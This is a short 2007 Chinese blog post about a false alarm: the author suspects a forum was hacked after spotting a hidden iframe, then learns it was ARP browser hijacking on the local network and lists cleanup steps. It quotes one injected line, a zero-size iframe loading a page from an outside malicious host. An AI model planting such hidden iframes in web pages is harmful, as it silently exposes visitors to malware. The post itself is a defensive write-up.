arp浏览器劫持(虚惊一场)

偶然打开bbs.guzhenu.com发现正在从878772.cn读取数据...

查看源文件,第一句"<iframe src='http://878772.cn/arp.htm' width=0 height=0></iframe> "

马上想到bbs.guzhenu.com被挂马,立即Q留言guzhneu的站长说他论坛被挂马了,3389登陆服务器一看..........完全正常啊..郁闷,赶紧谷歌了一下,原来arp浏览器劫持也~(只有局域网用户受此影响)

清除系统internet所有缓存文件后再将C:\Documents and Settings\Administrator(可能要替换成你的用户)\Local Settings\Temp里面的所有文件全部删除,~可能要在安全模式下才能删),然后再装个arp防火墙,就OK了~ 有空的时候再去找到局域网内的病毒源清除就没事了,呵呵.

处理方法: http://bbs.023wz.com/dispbbs_2_11_1.html

posted @ 2007-08-09 19:11 missthe 阅读(248) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

蒙上灰尘的阳光 happy.b3b4.org

专注于asp.net&C#技术

arp浏览器劫持(虚惊一场)

公告